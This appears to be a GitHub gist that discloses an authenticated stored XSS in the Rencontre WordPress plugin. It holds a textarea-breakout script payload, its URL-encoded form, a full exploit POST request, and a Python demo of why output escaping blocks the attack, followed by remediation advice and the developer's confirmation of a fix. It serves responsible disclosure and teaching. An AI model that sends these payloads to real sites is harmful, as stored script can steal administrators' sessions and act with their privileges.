@sathishshan
Last active November 5, 2019 09:07
# Exploit Title: Rencontre WordPress plugin - Authenticated Stored XSS
# Date: 04/08/2019
# Exploit Author: Sathishshan
# Version: <= 3.1.3
# Vendor Homepage: Rencontre
# Software Link: https://wordpress.org/plugins/rencontre/
# Tested on: Ubuntu-server 18.0.* OS
# Category : Webapps
# Description
An authenticated persistent (stored) cross-site scripting vulnerability exists in the plugin's WordPress admin interface. The "textmail" and "textanniv" values saved from the plugin's Email settings page are written back into the page without output encoding, so an attacker with access to that page can store arbitrary HTML/script that executes in the browser of any user who later views it.
# Reproduction Steps:
0. Authenticated stored XSS in two parameters (textmail and textanniv).
1. Log in to WordPress and open the plugin's Email settings page (http://192.168.144.128/wp-admin/admin.php?page=rencontre.php&renctab=mel).
2. Under "Introductory text for the summary email (After hello login - Before the smiles and contact requests)" and "Full text for the birthday mail (After hello pseudo)" there is a text area.
3. Enter or paste the payload into either text area and save. The payload closes the surrounding <textarea> and <td> elements, so the injected script runs each time the settings page is rendered.
# POC:
Parameters: textmail & textanniv
Payload: </textarea></td><script>alert('XSS')</script>//
Encoded-Payload: %3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F
# Exploit Request:
POST /wp-admin/admin.php?page=rencontre.php&renctab=mel HTTP/1.1
Host: 192.168.144.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.144.128/wp-admin/admin.php?page=rencontre.php&renctab=mel
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
Connection: close
Cookie: {04425c0c-9ebb-4574-a010-98925da741c5}=value; wordpress_bcee6f23870sd88d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrsdQqBUZ4Ul3XESucFBByPmUEdIF%7C05e93f0c17987198aaebc4bf797d1f74eedsda8f08f61fd82026e207c6325b7ccf; PHPSESSID=nce78sdi7qvm2g4d63dgar2n68rc; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcee6f2387088d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XEsdSucFBByPmUEdIF%7C84170a324sdg458679871685b28dcb147a2e88ae850eb6c5d8bb2ecc16as36a894005; wp-settings-1=editor%3Dtinymce%26hidetb%3D0%26mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1564825233
Upgrade-Insecure-Requests: 1
mailmois=0&textmail=</textarea></td><script>alert('XSS')</script>//&textanniv=</textarea></td><script>alert('XSS')</script>//&qmail=0
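The following Python script is an added example written for this page; it is not code from the advisory or from the Rencontre plugin. It reproduces in miniature why the payload above works and why output encoding stops it: a constructed template echoes the two saved values into <textarea> elements the way a vulnerable settings page would, a hardened variant passes them through html.escape() first (the same transformation WordPress's esc_textarea() applies), and a small parser counts how many <script> elements end up outside any textarea, which is what a browser would actually execute. It also rebuilds the URL-encoded POST body from the request above so the Encoded-Payload line in the POC can be checked. The table markup is constructed for the example and is not the plugin's real template.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote, urlencode

# Payload from the advisory: close the textarea and its table cell, inject a
# script element, and leave "//" to swallow whatever follows on the same line.
PAYLOAD = "</textarea></td><script>alert('XSS')</script>//"


def render_vulnerable(textmail: str, textanniv: str) -> str:
    """Constructed stand-in for a settings template that echoes saved values
    into <textarea> elements verbatim (the unescaped-output pattern). This is
    not the Rencontre plugin's template; the layout only mirrors what the
    advisory's payload expects, a <textarea> inside a <td>."""
    return (
        "<table><tr><td>"
        f'<textarea name="textmail">{textmail}</textarea>'
        "</td></tr><tr><td>"
        f'<textarea name="textanniv">{textanniv}</textarea>'
        "</td></tr></table>"
    )


def render_hardened(textmail: str, textanniv: str) -> str:
    """Same template, but each value is HTML-entity encoded before it is placed
    in textarea content, which is what WordPress's esc_textarea() does."""
    return render_vulnerable(html.escape(textmail, quote=True),
                             html.escape(textanniv, quote=True))


class _ScriptFinder(HTMLParser):
    """Counts <script> start tags that appear outside any <textarea>.

    A browser treats textarea content as RCDATA, so a <script> tag that is
    still inside the textarea is inert text; only one that follows a real
    </textarea> becomes an element and executes. html.parser does not know
    about RCDATA, so the in_textarea flag approximates that rule."""

    def __init__(self) -> None:
        super().__init__()
        self.in_textarea = False
        self.executable = 0

    def handle_starttag(self, tag, attrs):
        if tag == "textarea":
            self.in_textarea = True
        elif tag == "script" and not self.in_textarea:
            self.executable += 1

    def handle_endtag(self, tag):
        if tag == "textarea":
            self.in_textarea = False


def executable_scripts(page: str) -> int:
    """Number of <script> elements a browser would execute when rendering page."""
    finder = _ScriptFinder()
    finder.feed(page)
    finder.close()
    return finder.executable


def encoded_payload() -> str:
    """URL-encode the payload the way the advisory's Encoded-Payload line shows
    (every reserved character, including '/', percent-encoded)."""
    return quote(PAYLOAD, safe="")


def exploit_body() -> str:
    """Rebuild the form body of the POST in the advisory with both fields set."""
    return urlencode({"mailmois": "0", "textmail": PAYLOAD,
                      "textanniv": PAYLOAD, "qmail": "0"})


if __name__ == "__main__":
    print("vulnerable page, breakout payload:",
          executable_scripts(render_vulnerable(PAYLOAD, PAYLOAD)), "script(s) execute")
    print("vulnerable page, bare <script> without breakout:",
          executable_scripts(render_vulnerable("<script>alert(1)</script>", "")),
          "script(s) execute")
    print("hardened page, breakout payload:",
          executable_scripts(render_hardened(PAYLOAD, PAYLOAD)), "script(s) execute")
    print("encoded payload:", encoded_payload())
    print("POST body:", exploit_body())
```

The bare `<script>` case is included on purpose: without the leading `</textarea></td>` the injected tag stays inside the textarea and never executes, which is why the advisory's payload starts by closing those elements. Encoding the saved value on output turns the closing tags into text, so the breakout is impossible regardless of what was stored.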
# Impact:
An attacker with a WordPress account that can reach the plugin's settings page can store script that runs in the browser of any user who later opens that page, including site administrators, and use it to steal cookies, session tokens, credentials and personal data, or to perform actions with the victim's privileges.
# Remediation:
Uninstall the plugin until the developer ships a fix that HTML-encodes the textmail and textanniv values on output (WordPress provides esc_textarea() for exactly this case), then update to the fixed release.
# Disclosure timeline:
04/08/2019: Vulnerability identified.
04/08/2019: Informed developer of the vulnerability.
14/08/2019: No reply from the developer.
@boiteasite

Hi,
Issue fixed.
Regards

@sathishshan

sathishshan commented Nov 5, 2019 via email

@boiteasite

The #1 Auth_Stored_XSS.txt was fixed in September.
The #0 Auth_Stored_XSS.txt will be fixed today.
Regards

@sathishshan

sathishshan commented Nov 5, 2019 via email
